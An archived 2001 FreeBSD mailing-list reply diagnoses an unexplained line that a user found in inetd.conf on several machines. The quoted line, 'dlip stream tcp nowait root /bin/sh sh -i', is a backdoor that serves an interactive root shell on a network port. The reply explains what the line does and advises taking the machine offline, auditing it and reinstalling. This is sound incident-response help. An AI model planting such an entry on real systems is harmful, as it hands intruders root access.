From owner-freebsd-stable  Tue Jul 31 14:53: 0 2001
Delivered-To: freebsd-stable@freebsd.org
Received: from drkshdw.org (user4.net011.fl.sprint-hsd.net [207.30.203.4])
	by hub.freebsd.org (Postfix) with SMTP id 1A21D37B401
	for <freebsd-stable@freebsd.org>; Tue, 31 Jul 2001 14:52:57 -0700 (PDT)
	(envelope-from scorpio@drkshdw.org)
Received: (qmail 5970 invoked by uid 85); 31 Jul 2001 21:52:54 -0000
Received: from scorpio@drkshdw.org by drkshdw.org with qmail-scanner-0.96 (uvscan: v4.1.40/v4149. . Clean. Processed in 0.259624 secs); 31 Jul 2001 21:52:54 -0000
Received: from localhost.isni.net (HELO localhost) (scorpio@127.0.0.1)
  by localhost.isni.net with SMTP; 31 Jul 2001 21:52:53 -0000
Date: Tue, 31 Jul 2001 17:52:53 -0400 (EDT)
From: Jeff Palmer <scorpio@drkshdw.org>
X-X-Sender:  <scorpio@jeff.isni.net>
To: Hayden Katzenellenbogen <haydenk@nextlevelinternet.com>
Cc: <freebsd-stable@freebsd.org>
Subject: Re: Extra Line in my inetd.conf
In-Reply-To: <NFBBKLNOALGIGCIMHGKFGEPOCCAA.haydenk@nextlevelinternet.com>
Message-ID: <20010731174952.B5845-100000@jeff.isni.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-stable@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-stable.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-stable>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-stable>
X-Loop: FreeBSD.ORG

You have been hacked.

this line simply opens up a shell (/bin/sh) in interactive mode (-i) on
the port "dlip"  as specified in your /etc/services file. (typically 7201)

I'd advise taking that machine OFF the network,  and perform an audit.
Refer to online documentation on how to diagnose, analyze, and cure the
exploit the attacker used to penetrate your system.  Then  apply that
knowledge to the newly FORMATted machine.  (Yes,  I recommend a full
format/reinstall of the OS)


Jeff Palmer
scorpio@drkshdw.org



On Tue, 31 Jul 2001, Hayden Katzenellenbogen wrote:

> I have noticed this line at the bottom of some of my inetd.conf files on a
> few of my machines.. it is though not commented out I have commented it out
> as well I have no idea what it does...
>
> any one care to shed some light on this?
>
>
>
> #dlip        stream  tcp     nowait  root    /bin/sh sh -i
>
>
> Thanks
> Hayden
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-stable" in the body of the message
>
>


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-stable" in the body of the message